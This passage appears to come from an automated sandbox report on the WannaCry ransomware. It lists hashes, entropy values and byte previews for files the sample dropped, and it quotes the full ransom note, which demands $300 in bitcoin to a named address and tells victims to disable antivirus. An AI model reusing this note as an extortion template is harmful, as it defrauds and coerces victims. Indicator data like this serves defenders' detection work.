                                                                              SHA-512:C6B2FF73F953E097A08123140B4AB8A0D3080F4BCF4AD2CEC4F773FF0191EC24123917265FF37B811AAE2A08E4AD47F0E3C53D1BB9C02B7D28844C4FA369A31E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......N.....^Q.y<..y_...L3S#..>.....$5...4.........V`BM..+...........z;D.....4U.2....6.s...6.tSG..........T....L. ..bp|.?.._..k.`.....'............D.....t.U..o....[;ZY-(X.n.....`..`..L....Q....<...u....5.....[X;..g...k.. .j.0.!q..4isvw...#. ..p|&.............v..O...;}$lN...V.A.%4....6.>F...I......N@..b..d.4....r7..>U.#s~....e...-..K.C4.!C.d\..slA.=...*....w...NI.xn..#O.........q2i....#.4n.J ..^.......}...v../..^...0.....s..oJ....{..5...~...<,X..s{i(.."..t..fz......G0\.D. ...r6!9.@..)/....<...A.K..........1&..{..1..R_...]..G.o..Ja>.....T.....U|...v.=..v....t.........:).......,=.B.3'%.[.hXq.:s...z. .<.....7..@.Ip.a/..........|a9..8.b..&N..*<.@....vq.O.&o*.A#0B..!Cs.....Sx[#(.....$..I.G......T;......S.@e.X.g..Q../.........^C.B%7.[.........TuZ..6.%.Y*E/.....|p.`.NNHf.,.q.i...!...uy...%.`.c&*.=t..gN.Ly!.+.t;....5........Kf. .\.y.y.s....h)...-..^.5t....#..QBI{..Eq)GAz{...:.V......T.U...t.O...:.c,\.#.X2...N.Z.2**K..........S..a.&.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.830368654853684
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkAUvAR/hNkIjuqcgB9CPO6Gx720K8g6H/h0iCv2ghfD+/zKsKmivhaW/D5:bkAUIhqQv720KD6Hm1hfD+7K5mXWL5
                                                                              MD5:DA92E40CB82AEF1C0C9A0C32E3E5BD72
                                                                              SHA1:EC361386435B8BD650ACA50BC639136FF5FA4980
                                                                              SHA-256:46C0441311DDA3382B671B5A2E8A23E41857440398833D41885FB734D56BCA13
                                                                              SHA-512:C6B2FF73F953E097A08123140B4AB8A0D3080F4BCF4AD2CEC4F773FF0191EC24123917265FF37B811AAE2A08E4AD47F0E3C53D1BB9C02B7D28844C4FA369A31E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......N.....^Q.y<..y_...L3S#..>.....$5...4.........V`BM..+...........z;D.....4U.2....6.s...6.tSG..........T....L. ..bp|.?.._..k.`.....'............D.....t.U..o....[;ZY-(X.n.....`..`..L....Q....<...u....5.....[X;..g...k.. .j.0.!q..4isvw...#. ..p|&.............v..O...;}$lN...V.A.%4....6.>F...I......N@..b..d.4....r7..>U.#s~....e...-..K.C4.!C.d\..slA.=...*....w...NI.xn..#O.........q2i....#.4n.J ..^.......}...v../..^...0.....s..oJ....{..5...~...<,X..s{i(.."..t..fz......G0\.D. ...r6!9.@..)/....<...A.K..........1&..{..1..R_...]..G.o..Ja>.....T.....U|...v.=..v....t.........:).......,=.B.3'%.[.hXq.:s...z. .<.....7..@.Ip.a/..........|a9..8.b..&N..*<.@....vq.O.&o*.A#0B..!Cs.....Sx[#(.....$..I.G......T;......S.@e.X.g..Q../.........^C.B%7.[.........TuZ..6.%.Y*E/.....|p.`.NNHf.,.q.i...!...uy...%.`.c&*.=t..gN.Ly!.+.t;....5........Kf. .\.y.y.s....h)...-..^.5t....#..QBI{..Eq)GAz{...:.V......T.U...t.O...:.c,\.#.X2...N.Z.2**K..........S..a.&.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811778299773159
                                                                              Encrypted:false
                                                                              SSDEEP:24:DTWmccvBJmSsZQc/wkyEcy86IAjoZ0FUTnd:DTHBErZh1FIDZuUTd
                                                                              MD5:33D22493F2AD73972B748AAB972CC8C8
                                                                              SHA1:F88434FE77C490C3BA9926267F8A474FDC30DE2F
                                                                              SHA-256:A5F1E7FE71617598AA2197654747250935C0619ED4941293869C731C2030A4D8
                                                                              SHA-512:350DBF2B1DA19B004E7F6F4383AA44AB25E1DECABCDEF0BD49E447727D425CAD5E195AE602987EEA277569F741363C4E13E960A5E7C54E35AB20106ED31A989A
                                                                              Malicious:false
                                                                              Preview:...`.J.6.....o....j@..e.g..T..M.;$?9.....M.]<....je^..!.GP3.{...e...k....C..n.Q.20=...U...~.'zo..b........].Y.9.,...]..P..p...0...6o....]`J._#...*.........]....k.R}..$8z.~...%..}B.:4.u..%).O..r\..qK4..v_85.i.?&o.%..T.k...M.J.`.%m.....C$..&P....&...^@>O1qx...6..n../.0.o.....7f...v.QD.iz.M.h.:%H..6.k}.Y........"v..B.j!u...!..\..A(.a.WaH.~.N.]H...1...9.&..\..&8G.XlI.L.fi&...|`}~........3xDZ....w!pK.5.......$?.5.Vh..5B..&..).kM'T..E.....u...S...a8.E....N...|3...Zh.Pd..G.....H.,:~....R.J...h...%...o6.[..^..,Q..s..\.M.a.p.z.,...Jv"VG.{..%+f..j.D^.....Afb.!B..C..|.........3um...1./...q..ag$+?..Z.....~J.O~..P.7x....[....j"..AV(.b..MCyp...[..c.......6..I?....}>...k'f...p.uZp....:@..-...MrW<..Q\...~"2;.......V1..x....+'k.a..E...x.^I..p0...._......8..)C..|.........^..z...G.\.il fI.*X.....1.....1.."..%.Q..}X.....3$.DX.p.e..".............1.r.9Q?"N.L..}..2.9...o.I.I..UP. .Q.me_..]...3.....e.}P...%.e..#...K!.rG.S..{.u...4.V.W...V;J./...........3...I.-..y2.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.822798910949508
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkf7uFHETnmYWaJLWzy5Muv40Z8/UFJzEEqhO+KBXS4otHXLg/Ylcir7KmbIjJ0u:bkwYWet5l8/UPRIOXBXSZHXLg/Yl01jl
                                                                              MD5:CB06EE520BF129272D89BD285C22EDE4
                                                                              SHA1:0D95E1BA5ECD13119177EA9A90CDDCA6F1900086
                                                                              SHA-256:6EC20EFD1842F0F9C72AA14A7F756CF3CE2117D370BDB384A11E607BECF47666
                                                                              SHA-512:B1FB4B51D8FBF4637262D161188160BE9EDBC509E544CC83CED8E3B20CF2AF9F065D952DA5BD9DDA008DFFCB2AD9197AF7C59B7E6DC8C85E08766525299977DC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+.CS%..y:........5...5_...@."..... T...H......C..zw.......u1..r....AD.8.1..Az|.'....^~......u..](.^.y..>..i...fA...by...]9.].M..d.VqyS.g.2..Ed..e..~..Cu.zBF....I.5.......\.c.U.."..m.._...6..,.. 6.......}W.._....{..K(..w*.QP..Z..`Jb.........#..j.................#4.xw.U.[(..Sc.G6.......:......+.2...v..,.....o..c....AR.u_I....O.......K...+.?^......L...+..x@.%..<.F..O.%..rVbdv3.\.l...[...7e........<...M....0kX....._.....t..&34.9...*......2...d.M.F.."..M..z|.......O...=.Q.....2..yw...].`.....F...+7z.....!2Y^!j7..?........J.W}.......].d.Q.Y..........v.f..P.#%>/.4.ETbU."..Uq.y...%.BFxn^.dO.r@..n...L..3....x....e.X.a..w......!..W}.A.92..;.!....+..qT..*.f.)..1.....I.x..[..aR$.3BSI.....L. *d...p>*.;.q..........K.M...y..#......q..J.z..,(.FiB..=..._]...W.M.w..*........R.Ld*c>...1.d$....Egd.J~iO..5.B...C..........r.......................F....Ny.Z.U.:d.3.w@...?....*-|.*..[......*..l*'..$...1...~q=u.H..........K..`.n.EI......B.|...>.X.E..[.n..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.822798910949508
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkf7uFHETnmYWaJLWzy5Muv40Z8/UFJzEEqhO+KBXS4otHXLg/Ylcir7KmbIjJ0u:bkwYWet5l8/UPRIOXBXSZHXLg/Yl01jl
                                                                              MD5:CB06EE520BF129272D89BD285C22EDE4
                                                                              SHA1:0D95E1BA5ECD13119177EA9A90CDDCA6F1900086
                                                                              SHA-256:6EC20EFD1842F0F9C72AA14A7F756CF3CE2117D370BDB384A11E607BECF47666
                                                                              SHA-512:B1FB4B51D8FBF4637262D161188160BE9EDBC509E544CC83CED8E3B20CF2AF9F065D952DA5BD9DDA008DFFCB2AD9197AF7C59B7E6DC8C85E08766525299977DC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+.CS%..y:........5...5_...@."..... T...H......C..zw.......u1..r....AD.8.1..Az|.'....^~......u..](.^.y..>..i...fA...by...]9.].M..d.VqyS.g.2..Ed..e..~..Cu.zBF....I.5.......\.c.U.."..m.._...6..,.. 6.......}W.._....{..K(..w*.QP..Z..`Jb.........#..j.................#4.xw.U.[(..Sc.G6.......:......+.2...v..,.....o..c....AR.u_I....O.......K...+.?^......L...+..x@.%..<.F..O.%..rVbdv3.\.l...[...7e........<...M....0kX....._.....t..&34.9...*......2...d.M.F.."..M..z|.......O...=.Q.....2..yw...].`.....F...+7z.....!2Y^!j7..?........J.W}.......].d.Q.Y..........v.f..P.#%>/.4.ETbU."..Uq.y...%.BFxn^.dO.r@..n...L..3....x....e.X.a..w......!..W}.A.92..;.!....+..qT..*.f.)..1.....I.x..[..aR$.3BSI.....L. *d...p>*.;.q..........K.M...y..#......q..J.z..,(.FiB..=..._]...W.M.w..*........R.Ld*c>...1.d$....Egd.J~iO..5.B...C..........r.......................F....Ny.Z.U.:d.3.w@...?....*-|.*..[......*..l*'..$...1...~q=u.H..........K..`.n.EI......B.|...>.X.E..[.n..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):271360
                                                                              Entropy (8bit):7.999322858109388
                                                                              Encrypted:true
                                                                              SSDEEP:6144:VBtANyAhkEmDp1GfhfKICr5efqBfVnCwg3nB8:zAhfZhfKjrUqNppgi
                                                                              MD5:2E71044D7EB3B297544424C23F0C2B6C
                                                                              SHA1:F4E06CF76F6B15B3C0DD417FFAA713AAF3C27707
                                                                              SHA-256:FE0902B991203755585C603283E7DF7BEA06B55C182FD2F6297B4736914F2424
                                                                              SHA-512:409FE6A3B1EA2AD6DCE7C820682B18C08F4FED169D7C5EAB365E17F6AD8BCA225BD57E6649003BDDCC6D7BC3419D10D716EAF9B82151EDA07A7343FC5F582138
                                                                              Malicious:true
                                                                              Preview:.B..E.H.G.5......>..Y..gY..P.n*9..%m..7......)..^.?.$(...Z;g$....A...b].9.V.....?......je.Ji...>l..@..0.R.....5v...?...(..rh....=nk.....r..)...?....q........q.....1..f...........p..D..W..h2...D...9....X3...+.w7..S....[.H.A.G6Kg.....:...y...e..#..._.U..^N.&...ss..<y.o.c..N`..$..y.4.6... ....K...>Y...[..j.O..Y.f...|.9.[B!..=.Z}..p......../..d.M.j....L....N!JJ...*..1...z Z......7...%..$...k..8.....O..O.^.g-...1.?.#..:S.0.....>...^...F._...\M.... ........H.....eE.Y.N..~Q.m...C.-.Mj)..#...f.I....zk......#.....p......C..?.7.n.-...Z.G.$n....R.+..J....m...b'U._.Im&.j.[..k4h.G... w}.f:..r...n....LB:..9T.........$xn0)...../.8.f}........M..L.x.`.Y3..dJ.md....[.f.F..)(.M...G...{.|..o..2O4.'..w...Y..Wk.3....C.A...k.~Vv.d..<...qH....~...B...|sVldkj7...T.$!...f.G..L'7.li$......n/.x..V.ss...-......C......w.g..:...4'.xsc.#d..\.h.s42.-.k...u.@6.e........?v%....K*Do.j.t.0FeyQsH4Pl.T.7&.....T...or{s...[b..L.N=...Z .kW...9.#)..I.&....8.:1.[..x.....?.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):271640
                                                                              Entropy (8bit):7.9992882625864326
                                                                              Encrypted:true
                                                                              SSDEEP:6144:9C/Ib0AqZDVLGOhJg9M8wcKDFgH8jqjPrmGsSkj6PaoWjih/1u:oy0AcCOhq9MbtgHEkPr/I4aHGdU
                                                                              MD5:EC253D3747AD512E2825FD60B0169D75
                                                                              SHA1:DBD12FF239D380EF6DD9FBDF62862F9F4F540C16
                                                                              SHA-256:AF54C91730FBACF1FD1197B1120AA9D34C15814AE4ADC20249B63647AE7472AA
                                                                              SHA-512:106E7F6E7CB73E29FFDC6E91E68977F7671C4022CC19FD0A4FBA4C97FD20829764710C8E0D2FAC8C356A95650449F796E03CD6BAE460C9FD9BEBFCEA5FD41351
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....+B..P.L......V.no'.x.....E.(S..m..o..5-.u09~...D.0\G....\..9.c...5.......n2....L.q..1."..Ca.U5.....IZ....=. .."./..?B<...<....J..N.U..^....>.7...r...)..%.........u.?....C.~1.1..t./.....3x...#...{0'*$O.......5l..65.M9....>.J.4.V..q.i..M......$......E...S%Su.2..>..n.VZZyT...Z$I...Dx.....d..b.{.hq........\...d...a.klr.....'....YD..t9F1q}.g......i...8$..N*>e....RJ..........>.-.?.....;.......1.*5;...@'.9'<..-..D....s4..l............tZc.L.|O.+....b.h.p^..........x.C2l...?.........,5.?.:.}.t..x..;y/. .......L...O.....A.0.9.,....?...D1..e^%.7..rf.N.@..+n$6.,b....RV..#./...!..._.+.....:z....h.;o..y......@....Ep....._....7..P...l..C...CWLD03.b.8.".M...t..<Q[./K<Ph..t..N....!..Y..5..r.A..j.{..n..#.C....".O.].t..@.C...c:sI..ma.+..f.b..NH=.n....=..>Q..%.].0...U.!..h...^_/.^..?..Al.c=..P.4.a.....S.<.....7..=M....f.}.eROl.._O^..\....Kjb.....^...t....{."` ND(.......3.z'..h.}.._...g..NE...........?......+"^...L...a..6......K.g. ~.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):271640
                                                                              Entropy (8bit):7.9992882625864326
                                                                              Encrypted:true
                                                                              SSDEEP:6144:9C/Ib0AqZDVLGOhJg9M8wcKDFgH8jqjPrmGsSkj6PaoWjih/1u:oy0AcCOhq9MbtgHEkPr/I4aHGdU
                                                                              MD5:EC253D3747AD512E2825FD60B0169D75
                                                                              SHA1:DBD12FF239D380EF6DD9FBDF62862F9F4F540C16
                                                                              SHA-256:AF54C91730FBACF1FD1197B1120AA9D34C15814AE4ADC20249B63647AE7472AA
                                                                              SHA-512:106E7F6E7CB73E29FFDC6E91E68977F7671C4022CC19FD0A4FBA4C97FD20829764710C8E0D2FAC8C356A95650449F796E03CD6BAE460C9FD9BEBFCEA5FD41351
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....+B..P.L......V.no'.x.....E.(S..m..o..5-.u09~...D.0\G....\..9.c...5.......n2....L.q..1."..Ca.U5.....IZ....=. .."./..?B<...<....J..N.U..^....>.7...r...)..%.........u.?....C.~1.1..t./.....3x...#...{0'*$O.......5l..65.M9....>.J.4.V..q.i..M......$......E...S%Su.2..>..n.VZZyT...Z$I...Dx.....d..b.{.hq........\...d...a.klr.....'....YD..t9F1q}.g......i...8$..N*>e....RJ..........>.-.?.....;.......1.*5;...@'.9'<..-..D....s4..l............tZc.L.|O.+....b.h.p^..........x.C2l...?.........,5.?.:.}.t..x..;y/. .......L...O.....A.0.9.,....?...D1..e^%.7..rf.N.@..+n$6.,b....RV..#./...!..._.+.....:z....h.;o..y......@....Ep....._....7..P...l..C...CWLD03.b.8.".M...t..<Q[./K<Ph..t..N....!..Y..5..r.A..j.{..n..#.C....".O.].t..@.C...c:sI..ma.+..f.b..NH=.n....=..>Q..%.].0...U.!..h...^_/.^..?..Al.c=..P.4.a.....S.<.....7..=M....f.}.eROl.._O^..\....Kjb.....^...t....{."` ND(.......3.z'..h.}.._...g..NE...........?......+"^...L...a..6......K.g. ~.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812134223843723
                                                                              Encrypted:false
                                                                              SSDEEP:24:kDHefbfuUs+x4Sob6YlGWh4/bucCHPyCNoH03dq7/6kspkrkfZL/J29Xe:kD+fbfuHoY6Y8Wh4/acQi8A7LsqSZ7Jb
                                                                              MD5:B10A8ED8E5446234AFB5712852D1E1FE
                                                                              SHA1:0A3488E8085E9E315109F33A10A028682493AA58
                                                                              SHA-256:2FA12A1759118CD2CECA16A1562080914FE00D226E4438CC98DDFE19B3453B72
                                                                              SHA-512:A490A492779D9ACF7DE335D8336174D67EEA54E7E00CBBF7D2776A137FA5FC579833E52E0B9783A9C37A8E5D40B97F018730188756E615C6F4DAEA3AC56CDD4B
                                                                              Malicious:false
                                                                              Preview:....~+.2X<...s.,....cch..oj.C../.AsAW..#}P..n.nRUz5I^.^R..u.".9..=....Y.H.....-D./...e.h~$6.t..o.....t...L..V<%.x.........V)R..-.........)ZD<.8.D.2."%+.5k...9...g...k.|.....#pkS..7......?.$y.H^GH....X.J..y5.wY4.&.A.........Z...}V@......U....E..e.L.;...._Ma.~.|..V.|c..uk.Ld..........,4..pQ....E..H....E..Pt.-w..#T.b.}.............f..g.}.]../ ...4*.i....4...Wur.[{<....C..%.1..rY.j.f...%._../.V^.m.#..fZ...7I..O.#..@<...|...~M9....D.....~+.L..G-/...^$.......p.f...Q..z..kxC.....).&.. .D.i....1d......us.w.z...y..+.F...V........9.....&.{"Ef.Dy.........l.......I|....!.zk ,wq...t......i.'!B.e....A.......3TP.^..j....*.'..[..f..?.T..#..../,.?............3.p..D.l..)..k.M...0...S.`.....P. /.;[ zr........w<y.\.>{....'A..+...BD4..?...`........2.w}.....9.Z...>0.L...!....M...n.?...<.G.,...R....F>.A.tX.D..'..h'...{.E....X..(..&A~........=U..n$..ON.... mAp.....3.>u.sa.#..3.iG......c.Q+...::.....T...S|...c ......?...~..8..Cs...j.t~...h1h.[7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.833626621743295
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk85JbMgG5sGmbPbBFwFk4q/xNAn0OJTGIeLn3b1T0+5UTasSivP9N1hUVn7/PWA:bkgJbhWRmbDXwFQNS0oGIeTL1T4v83WA
                                                                              MD5:C5BC5BC2B7CBDA160EBBF94A44CE630F
                                                                              SHA1:94C140F66ED897E34CBD7805642A257D83E52CB5
                                                                              SHA-256:AEE03FCD9649162238ADFE39898C9B4C60A7D91880C6B5521F69D669748D27CE
                                                                              SHA-512:683F122746122C3520B95487D6B352404D2A4C264A5B3EDCEA8D495EEDB3E7A4C77A9F72588126A5E7648A37CB7EB8E19334CBF96D64F6E3C69301D3309CA64B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l...9..Y..H..;.@^...;....ep...%...|m.U..../..jpc..[.........0.6.Hv...F.."..;..)t....w.....0.-..&@....k...,.-..H...0.tr...G...U.iF[....;..S....p.\-.".....p.'1.C...b..E.$.t.J......rw.."L(8|}....5...{S.Wu.<._...[\.X.5...5s<\....6.q]....:Q.|.e]%...............;n...d../..5.)1a.k.2.X..2}.gf..]...k........jp\.Y'...w.........PW3...N..Ke.....(`...p..H........w..q.r..)qb}.\..[~7. (.....18p.,...N.I....9J.}....^./.?r.....9v..B..8C.m.[../S..Z:....G~.+.-...a{.;....w..LWo...N...'#H.`...0.8....f....xE.... ......\....*...<....~.B2...gLK...:...X....8#...<<.4(.......2|...k....Hh.#uf.?......=Z....{ynL.R.=.x...N.:.V..2..G...rV..R.J..{K*.w...\B`c..Ytp..q.....|..h..YF..u...qN/.gFX..N;.OO......&6&.F-'.@.p"...h...\.o.f)cb.s).Z5.............B.6Z.y.R.^e...JCe%p....K.. .F...Q$......A.>........BN6:?.8...?}6...?3UW...2.F@.k....M...:F.$.W=./.......=....u.....b}...>...t...V...x.Uk....T.)...B>..hq...BW..g..G^^......87.*..O.r.U.8..-sa..B.E.R}..E.!..'.K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.833626621743295
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk85JbMgG5sGmbPbBFwFk4q/xNAn0OJTGIeLn3b1T0+5UTasSivP9N1hUVn7/PWA:bkgJbhWRmbDXwFQNS0oGIeTL1T4v83WA
                                                                              MD5:C5BC5BC2B7CBDA160EBBF94A44CE630F
                                                                              SHA1:94C140F66ED897E34CBD7805642A257D83E52CB5
                                                                              SHA-256:AEE03FCD9649162238ADFE39898C9B4C60A7D91880C6B5521F69D669748D27CE
                                                                              SHA-512:683F122746122C3520B95487D6B352404D2A4C264A5B3EDCEA8D495EEDB3E7A4C77A9F72588126A5E7648A37CB7EB8E19334CBF96D64F6E3C69301D3309CA64B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l...9..Y..H..;.@^...;....ep...%...|m.U..../..jpc..[.........0.6.Hv...F.."..;..)t....w.....0.-..&@....k...,.-..H...0.tr...G...U.iF[....;..S....p.\-.".....p.'1.C...b..E.$.t.J......rw.."L(8|}....5...{S.Wu.<._...[\.X.5...5s<\....6.q]....:Q.|.e]%...............;n...d../..5.)1a.k.2.X..2}.gf..]...k........jp\.Y'...w.........PW3...N..Ke.....(`...p..H........w..q.r..)qb}.\..[~7. (.....18p.,...N.I....9J.}....^./.?r.....9v..B..8C.m.[../S..Z:....G~.+.-...a{.;....w..LWo...N...'#H.`...0.8....f....xE.... ......\....*...<....~.B2...gLK...:...X....8#...<<.4(.......2|...k....Hh.#uf.?......=Z....{ynL.R.=.x...N.:.V..2..G...rV..R.J..{K*.w...\B`c..Ytp..q.....|..h..YF..u...qN/.gFX..N;.OO......&6&.F-'.@.p"...h...\.o.f)cb.s).Z5.............B.6Z.y.R.^e...JCe%p....K.. .F...Q$......A.>........BN6:?.8...?}6...?3UW...2.F@.k....M...:F.$.W=./.......=....u.....b}...>...t...V...x.Uk....T.)...B>..hq...BW..g..G^^......87.*..O.r.U.8..-sa..B.E.R}..E.!..'.K.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.792640838413994
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUKBOOnVCxmsV8ndYHO5XK9VAM0O6fVXsA/2NlGvlg/k:PBO4CEDndYHO1ZMh6NcArvKk
                                                                              MD5:1F1D0CBFAEE1654D4D9F62C98F6246D8
                                                                              SHA1:1D06184A3CBCD53D7CEBB394256C777AD8420771
                                                                              SHA-256:E95D0E6AC2CC646A5001AD98470873ED9B7FD3DE87EAC7CB395BD76277E42B41
                                                                              SHA-512:20DA21733D4F21C33E7AE60866F68E46FC4C93DAC5894E519F6B415E08482E610DDEB4A3726CF308A52FF91CAC0CD2342771A34E518EAE72AC88CF250810EEAE
                                                                              Malicious:false
                                                                              Preview:.h.!.....tPD.p....^..l.l..BV6D.....f"...SJ...y.l.....c..-..o.w..L......gz$a.Tk.Q.m.X.}7c.M.....7k..l...L..Rx..U7..K.......O..:.V;.,_Ayh.I.,L^Y.p ...".^.,....u.W3..4+...<... L.......%-El2s......x-..A......'H...:.D'.o.7...8.Q.......:S[.:..r$.6...S....'.S?s.....;..5.WH..".........Y....).. 3.-|....&...W..L.[u....k?U}.m...u........r{)p...9.z.J.t......b.v..../>aq.W...... ._..1....ES] T.^x6.M...5t.8.....*.2)..#....b. .Ce....K....\+eDu;.......&.Z.fn..z.....e........V?.S....t.......B.7./......>7..........5.r*.).......33.....#.dOj.K...Hp......8....T[Z%..4...V...u..../._... 2.....,.gT.X.].a...i6...<sc.W.K...!......=Ok ..'.k1)./....f..w.....#.3.....W.2....v,...R .......u.)hh...b..p.l=..S0;.p.8..@HLP?..h1.LYZ...U4..d......Qb.#....aqp)ob].Chcc....a...'fw.......{T..;n..:.2....A.i.....4..3....:...%.Y. ..F.]....H....OU....?I.... v....x....'.(......3..E)..b..e.wIpfJ..~..C.ZM.%..c)...pVb.......\.L}.6.L..M.......a......^G.R...[.EU/X..D.l.a.-'.U.Cm
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8187580886556285
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdXZIVSazF2KoPw7uLYp/A49rc2ni1rUKEaGrkI8vVBFEiTwn:bkdpIcax2KoPywKAenUUK/IAAn
                                                                              MD5:EA66585C673FFEDA3404D298B340A4E7
                                                                              SHA1:9CE1141B734EFF07D7EC9F6D966D3BAF03025B5F
                                                                              SHA-256:DDDBDCDF9211209A7C8514EBF93D11F0F2BA83C1EC1F7C0DBFC4B30D9F9FC5B4
                                                                              SHA-512:71D07A9EC3FDCE6E4C245E1F9C9DC0BFBB54E74718C6DE149D93F07D2BF7AA304D4FA4FBC46432C7EF6CDFA9811C312FA1C735CD59234EAE9B78DF31C73320A5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....$..t.j|.......?..j.. ..Gb.*r.....^^....9...t.]x...b&.Cw...`...^..m...XF..,.Q..r.J...=.....)Q{ l..F..T9yK.QT.......P.k.... ..-&.@.gg.v{/.O3....;.........B.J';......^of. ......`...J....g....T.t..;.O/..D..e.`8.L.<..cw....*.."...../A.P5..xJ..._X............../...P.T.....83....wtx..M$.....-..My$T.....:...>.......Y..q.N~'k..QR..y..l32.}.G4N:.6...;.....].,P.T.Q.C..(.Nr..-.`......tI.(.d........Ft.'X.iS...{-H..ycT...*.f.../..`...B1.<.W.].......J..W....^q6.(-.'..W.S.....fA/..lc.!...?...S..*3.....y.....t..MV.ZxO....S.......7.<.4d..B..7.".!S.Ev.H5?..7V2...g.f............../T...[X/.j.mN..4.7....*...pr.p....j..4~.=q.%.7....~t.n.+Q....Zx.3...m..c......Pb*Z.;.7....<......8~..*...f&.L.{.J.JhAw....W.AO.).H...@..kM.k.d...,.._....K......:..`.......8&..wG.+&+..k..!=.b^"..W.&F9.r.:F.......d...c.'-......ZU9...`.u...f8(.Eo........j ..E...7._.Y..z............w....7.csuYp.0.Av....3.3.*.....?.cJ."....UR..x.H.f.F6L.......F.<7..h...R.o..?. .c...~-
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
